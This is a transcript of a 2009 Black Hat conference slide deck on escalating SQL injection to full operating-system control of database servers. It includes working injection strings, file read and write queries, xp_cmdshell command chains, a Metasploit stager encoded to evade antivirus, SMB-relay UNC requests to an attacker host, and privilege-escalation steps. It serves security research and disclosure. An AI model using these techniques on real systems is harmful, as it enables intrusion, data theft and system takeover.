advanced sql injection to operating system full control (slides)
DESCRIPTION
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet. It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele). These slides have been presented at Black Hat Euroe conference in Amsterdam on April 16, 2009.TRANSCRIPT
![Page 1: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/1.jpg)
Advanced SQL injection to operating system full control
Bernardo Damele Assumpção Guimarães
Black Hat Briefings Europe Amsterdam (NL) – April 16, 2009
![Page 2: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/2.jpg)
2
Who I am
Bernardo Damele Assumpção Guimarães:
• Proud father
• IT security engineer
• sqlmap lead developer
• MySQL UDF repository developer
![Page 3: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/3.jpg)
3
SQL injection definition
• SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL statements
• It is a common threat in web applications that lack of proper sanitization on user-supplied input used in SQL queries
![Page 4: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/4.jpg)
4
SQL injection techniques
• Boolean based blind SQL injection:par=1 AND ORD(MID((SQL query),
Nth char, 1)) > Bisection num--
• UNION query (inband) SQL injection:par=1 UNION ALL SELECT query--
• Batched queries SQL injection:par=1; SQL query;--
![Page 5: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/5.jpg)
5
How far can an attacker go by exploiting a SQL injection?
![Page 6: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/6.jpg)
6
Scope of the analysis
• Three database software:– MySQL on Windows
– PostgreSQL on Windows and Linux
– Microsoft SQL Server on Windows
• Three web application languages:– ASP on Microsoft IIS, Windows
– ASP.NET on Microsoft IIS, Windows
– PHP on Apache and Microsoft IIS
![Page 7: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/7.jpg)
7
Batched queries
• In SQL, batched queries are multiple
SQL statements, separated by a
semicolon, and passed to the database
• Example:
SELECT col FROM table1 WHERE
id=1; DROP table2;
![Page 8: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/8.jpg)
8
Batched queries support
Programming languages and their DBMS
connectors default support for batched queries
![Page 9: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/9.jpg)
9
File system read access
![Page 10: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/10.jpg)
10
File read access on MySQL
• LOAD_FILE() function can be used to
read either a text or a binary file
• Session user must have these privileges:
– FILE
– CREATE TABLE for the support table
![Page 11: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/11.jpg)
11
File read access on MySQL
Via batched queries SQL injection technique:
SELECT HEX(LOAD_FILE('C:/example.exe')) INTO
DUMPFILE 'C:/WINDOWS/Temp/hexkflwl';
CREATE TABLE footable(data longtext);
LOAD DATA INFILE 'C:/WINDOWS/Temp/hexkflwl'
INTO TABLE footable FIELDS TERMINATED BY
'MFsIgeUPsa' (data);
![Page 12: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/12.jpg)
12
File read access on MySQL
Via any SQL injection enumeration technique:
• Retrieve the length of the support table's field value
• Dump the support table's field value in chunks of 1024 characters
On the attacker box:
• Assemble the chunks into a single string
• Decode it from hex and write on a local file
![Page 13: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/13.jpg)
13
File read access on PostgreSQL
• COPY statement can be used to read a text file
– User-defined function can be used to read a binary file
• Session user must be a super user to call this statement
![Page 14: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/14.jpg)
14
File read access on PostgreSQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data bytea);
COPY footable(data) FROM
'/etc/passwd';
![Page 15: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/15.jpg)
15
File read access on PostgreSQL
Via any SQL injection enumeration technique:
• Count the number of entries in the support table
• Dump the support table's field entries base64 encoded via ENCODE() function
On the attacker box:
• Assemble the entries into a single string
• Decode it from base64 and write on a local file
![Page 16: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/16.jpg)
16
File read access on MS SQL Server
• BULK INSERT statement can be abused
to read either a text or a binary file and save its content on a table text field
• Session user must have these privileges:
– INSERT
– ADMINISTER BULK OPERATIONS
– CREATE TABLE
![Page 17: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/17.jpg)
17
File read access on MS SQL Server
Via batched queries SQL injection technique:
CREATE TABLE footable(data text);
CREATE TABLE footablehex(id INT
IDENTITY(1, 1) PRIMARY KEY, data
VARCHAR(4096));
BULK INSERT footable FROM 'C:/example.exe'
WITH (CODEPAGE='RAW',
FIELDTERMINATOR='QLKvIDMIjD',
ROWTERMINATOR='dqIgILsFoi');
![Page 18: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/18.jpg)
18
File read access on MS SQL Server[…]
WHILE (@counter <= @length)
BEGIN
[…]
SET @tempint = CONVERT(INT, (SELECT
ASCII(SUBSTRING(data,@counter,1)) FROM footable))
[…]
SET @hexstr = @hexstr + SUBSTRING(@charset,
@firstint+1, 1) + SUBSTRING(@charset,
@secondint+1, 1)
[…]
INSERT INTO footablehex(data) VALUES(@hexstr)
END
[…]
![Page 19: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/19.jpg)
19
File read access on MS SQL Server
Via any SQL injection enumeration technique:• Count the number of entries in the support
table table2
• Dump the support table table2's varcharfield entries sorted by the integer primary key
On the attacker box:• Assemble the entries into a single string• Decode it from hexadecimal and write on a
local file
![Page 20: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/20.jpg)
20
File system write access
![Page 21: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/21.jpg)
21
File write access on MySQL
• SELECT … INTO DUMPFILE clause
can be used to write files
• Session user must have these privileges:
– FILE
– INSERT, UPDATE and CREATE TABLE for the support table
![Page 22: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/22.jpg)
22
File write access on MySQL
On the attacker box:
• Encode the local file content to its
corresponding hexadecimal string
• Split the hexadecimal encoded string into chunks long 1024 characters each
![Page 23: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/23.jpg)
23
File write access on MySQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data longblob);
INSERT INTO footable(data) VALUES
(0x4d5a90…610000);
UPDATE footable SET
data=CONCAT(data, 0xaa270000…000000);
[…];
SELECT data FROM footable INTO DUMPFILE
'C:/WINDOWS/Temp/nc.exe';
![Page 24: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/24.jpg)
24
File write access on PostgreSQL
• Large Object’s lo_export()
function can be abused to write
remote files on the file system
• Session user must be a super user
to call this statement
![Page 25: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/25.jpg)
25
File write access on PostgreSQL
On the attacker box:
• Encode the local file content to its
corresponding base64 string
• Split the base64 encoded string into chunks long 1024 characters each
![Page 26: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/26.jpg)
26
File write access on PostgreSQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data text);
INSERT INTO footable(data) VALUES ('TVqQ…');
UPDATE footable SET data=data||'U8pp…vgDw';
[…]
SELECT lo_create(47);
UPDATE pg_largeobject SET data=(DECODE((SELECT
data FROM footable), 'base64')) WHERE loid=47;
SELECT lo_export(47, 'C:/WINDOWS/Temp/nc.exe');
![Page 27: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/27.jpg)
27
File write access on MS SQL Server
• Microsoft SQL Server can execute commands: xp_cmdshell()
EXEC xp_cmdshell('echo … >> filepath')
• Session user must have CONTROL SERVERprivilege
• On the attacker box:– Split the file in chunks of 64Kb– Convert each chunk to its plain text debug
script format
![Page 28: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/28.jpg)
28
File write access on MS SQL Server
n qqlbc // Create a temporary file
rcx // Write the file size in
f000 // the CX registry
f 0100 f000 00 // Fill the segment with 0x00
e 100 4d 5a 90 00 03 […] // Write in memory all values
e 114 00 00 00 00 40 […]
[…]
w // Write the file to disk
q // Quit debug.exe
00000000 4D 5A 90 00 03 00 00 00
00000008 04 00 00 00 FF FF 00 00
[…]
Example of nc.exe:
As a plain text debug script:
![Page 29: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/29.jpg)
29
File write access on MS SQL Server
Via batched queries SQL injection technique:
• For each debug script:
EXEC master..xp_cmdshell '
echo n qqlbc >> C:\WINDOWS\Temp\zdfiq.scr &
echo rcx >> C:\WINDOWS\Temp\zdfiq.scr &
echo f000 >> C:\WINDOWS\Temp\zdfiq.scr &
echo f 0100 f000 00 >>
C:\WINDOWS\Temp\zdfiq.scr &
[…]'
![Page 30: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/30.jpg)
30
File write access on MS SQL Server
EXEC master..xp_cmdshell '
cd C:\WINDOWS\Temp &
debug < C:\WINDOWS\Temp\zdfiq.scr &
del /F C:\WINDOWS\Temp\zdfiq.scr &
copy /B /Y netcat+qqlbc netcat'
EXEC master..xp_cmdshell '
cd C:\WINDOWS\Temp &
move /Y netcat C:/WINDOWS/Temp/nc.exe'
![Page 31: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/31.jpg)
31
Operating system access
![Page 32: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/32.jpg)
32
User-Defined Function
• In SQL, a user-defined function is a
custom function that can be evaluated in
SQL statements
• UDF can be created from shared libraries that are compiled binary files
– Dynamic-link library on Windows
– Shared object on Linux
![Page 33: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/33.jpg)
33
UDF injection
On the attacker box:
• Compile a shared library defining two UDF:– sys_eval(cmd): executes cmd, returns stdout
– sys_exec(cmd): executes cmd, returns status
• The shared library can also be packed to speed up the upload via SQL injection:
– Windows: UPX for the dynamic-link library
– Linux: strip for the shared object
![Page 34: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/34.jpg)
34
UDF injection
Via batched queries SQL injection technique:
• Upload the shared library to the DBMS file system
• Create the two UDF from the shared library
• Call either of the UDF to execute commands
![Page 35: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/35.jpg)
35
UDF injection on MySQL
UDF Repository for MySQL
• lib_mysqludf_sys shared library:
– Approximately 6Kb packed
– Added sys_eval() to return command
standard output
– Compliant with MySQL 5.0+
– Works on all versions of MySQL from 4.1.0
– Compatible with both Windows or Linux
![Page 36: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/36.jpg)
36
UDF injection on MySQL
Via batched queries SQL injection technique:
• Fingerprint MySQL version
• Upload the shared library to a file system path
where the MySQL looks for them
CREATE FUNCTION sys_exec RETURNS int
SONAME 'libudffmwgj.dll';
CREATE FUNCTION sys_eval RETURNS string
SONAME 'libudffmwgj.dll';
![Page 37: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/37.jpg)
37
UDF injection on PostgreSQL
Ported MySQL shared library to PostgreSQL
• lib_postgresqludf_sys shared library:
– Approximately 6Kb packed
– C-Language Functions: sys_eval() and sys_exec()
– Compliant with PostgreSQL 8.2+ magic block
– Works on all versions of PostgreSQL from 8.0
– Compatible with both Windows or Linux
![Page 38: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/38.jpg)
38
UDF injection on PostgreSQL
Via batched queries SQL injection technique:
• Fingerprint PostgreSQL version
• Upload the shared library to any file system
path where PostgreSQL has rw access
CREATE OR REPLACE FUNCTION sys_exec(text)
RETURNS int4 AS 'libudflenpx.dll',
'sys_exec' LANGUAGE C […];
CREATE OR REPLACE FUNCTION sys_eval(text)
RETURNS text AS 'libudflenpx.dll',
'sys_eval' LANGUAGE C […];
![Page 39: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/39.jpg)
39
Command exec on MS SQL Server
xp_cmdshell() stored procedure:
• Session user must have sysadmin role or
be specified as a proxy account
• Enabled by default on MS SQL Server
2000 or re-enabled via sp_addextendedproc
![Page 40: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/40.jpg)
40
Command exec on MS SQL Server
• Disabled by default on MS SQL Server
2005 and 2008, it can be:
– Re-enabled via sp_configure
– Created from scratch using shell object
![Page 41: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/41.jpg)
41
Out-of-band connection
![Page 42: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/42.jpg)
42
OOB connection definition
Contrary to in-band connections (HTTP), it uses
an alternative channel to return data
This concept can be extended to establish a full-
duplex connection between the attacker host
and the database server
• Over this channel the attacker can have a command prompt or a graphical access (VNC)
to the DBMS server
![Page 43: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/43.jpg)
43
• Metasploit is a powerful open source exploitation framework
– Post-exploitation in a SQL injection scenario
• SQL injection as a stepping stone for OOB channel using Metasploit can be achieved
– Requires file system access and command execution via in-band connection – already achieved
A good friend: Metasploit
![Page 44: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/44.jpg)
44
On the attacker box:
• Forge a stand-alone payload stager with msfpayload
• Encode it with msfencode to bypass AV
• Pack it with UPX to speed up the upload via SQL injection if the target OS is Windows
OOB via payload stager
![Page 45: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/45.jpg)
45
Example of payload stager creation and encode:
Payload stager compression:
The payload stager size is 9728 bytes, as a compressed executable its size is 2560 bytes
$ msfpayload windows/meterpreter/bind_tcp
EXITFUNC=process LPORT=31486 R | msfencode -e
x86/shikata_ga_nai -t exe -o stagerbvdcp.exe
$ upx -9 –qq stagerbvdcp.exe
OOB via payload stager
![Page 46: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/46.jpg)
46
On the attacker box:• Run msfcli with multi/handler exploit
Via batched queries SQL injection technique:
• Upload the stand-alone payload stager to the file system temporary folder of the DBMS
• Execute it via sys_exec() or xp_cmdshell()
OOB via payload stager
![Page 47: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/47.jpg)
47
SMB authentication relay attack
• Initially researched by Dominique Brezinski back in 1996, presented at
Black Hat USA in 1997
• Patched by Microsoft on November 11,
2008 – MS08-068
– It prevents the relaying of challenge keys back to the same host which issued them
![Page 48: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/48.jpg)
48
SMB relay via SQL injection
• Metasploit has an exploit for this
vulnerability
– Launch the exploit on the attacker box
and wait for incoming SMB connections
• The database server must try to
authenticate to the SMB exploit
– UNC path request can be abused
![Page 49: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/49.jpg)
49
SMB relay via SQL injection
• MySQL – runs as Local System, no
challenge-response password hashes sent:
• PostgreSQL – runs as postgres user,
unprivileged:
SELECT LOAD_FILE('\\\\attacker\\foo.txt')
CREATE TABLE table(col text);
COPY table(col) FROM '\\\\attacker\\foo.txt'
![Page 50: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/50.jpg)
50
SMB relay via SQL injection
• Microsoft SQL Server:
– Session user needs only EXECUTE privilege on the stored procedure – default
– SQL Server 2000 runs as Administrator by default – attack is successful
– SQL Server 2005 and 2008 run often as Network Service – attack is unsuccessful
EXEC master..xp_dirtree '\\attacker\foo.txt'
![Page 51: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/51.jpg)
51
Stored procedure buffer overflow
• Discovered by Bernhard Mueller on December 4, 2008
– sp_replwritetovarbin heap-based buffer overflow on Microsoft SQL Server 2000 SP4 and Microsoft SQL Server 2005 SP2
• Patched by Microsoft on February 10, 2009 – MS09-004
![Page 52: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/52.jpg)
52
Buffer overflow exploit
• Session user needs only EXECUTE privilege
on the stored procedure – default
• Guido Landi wrote the first public stand-alone exploit for this vulnerability
– I added support for multi-stage payload and integrated it in sqlmap
![Page 53: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/53.jpg)
53
Data Execution Prevention
• DEP is a security feature that prevents
code execution in memory pages not
marked as executable
• It can be configured to allow exceptions
• Default settings allow exceptions:
– Windows 2003 SP1+: OptOut
– Windows 2008 SP0+: OptOut
![Page 54: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/54.jpg)
54
Bypass DEP
• When it is set to OptOut:
– Exception for sqlservr.exe in the registry
• Via bat file by calling reg
• Via reg file by passing it to regedit
• Via master..xp_regwrite
– Upload and execute a bat file which executes sc to restart the process
![Page 55: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/55.jpg)
55
Privilege escalation
![Page 56: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/56.jpg)
56
Windows Access Token abuse
• OS user privilege escalation via
Windows Access Token abuse is
possible also via SQL injection
• If the database process’ user has access
tokens, they can be abused to execute commands as another user, depending
on its token handlers
![Page 57: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/57.jpg)
57
Meterpreter extension: incognito
• Luke Jennings’ incognito extension for Meterpreter can enumerate user’s access tokens and impersonate a specific token
• Privilege escalation to Administrator or Local System if the corresponding token handler is within the thread of the process where meterpreter is running
![Page 58: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/58.jpg)
58
Churrasco
• Churrasco is a stand-alone executable
to abuse Access Tokens developed by
Cesar Cerrudo
– Brute-forces the token handlers within
the current process
– Runs the provided command with the brute-forced SYSTEM token
![Page 59: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/59.jpg)
59
Access Token abuse via SQL injection
• Network Services has access tokens
– Microsoft SQL Server 2005 and 2008
• Churrasco can be uploaded to the
database server file system and used in
the context of the out-of-band connection
attack to execute the payload stager as SYSTEM
![Page 60: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/60.jpg)
60
Credits
• Guido Landi
• Alberto Revelli
• Alessandro Tanasi
• Metasploit development team
• More acknowledgments and references
on the white paper
![Page 61: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/61.jpg)
61
Questions?
![Page 62: Advanced SQL injection to operating system full control (slides)](https://reader033.vdocuments.mx/reader033/viewer/2022052618/54923298b47959072a8b5300/html5/thumbnails/62.jpg)
62
Thanks for your attention!
Bernardo Damele Assumpção Guimarães
http://bernardodamele.blogspot.com
http://sqlmap.sourceforge.net